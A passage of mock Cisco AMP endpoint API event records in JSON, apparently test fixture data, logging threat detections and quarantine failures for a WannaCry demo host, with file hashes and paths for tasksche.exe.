found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 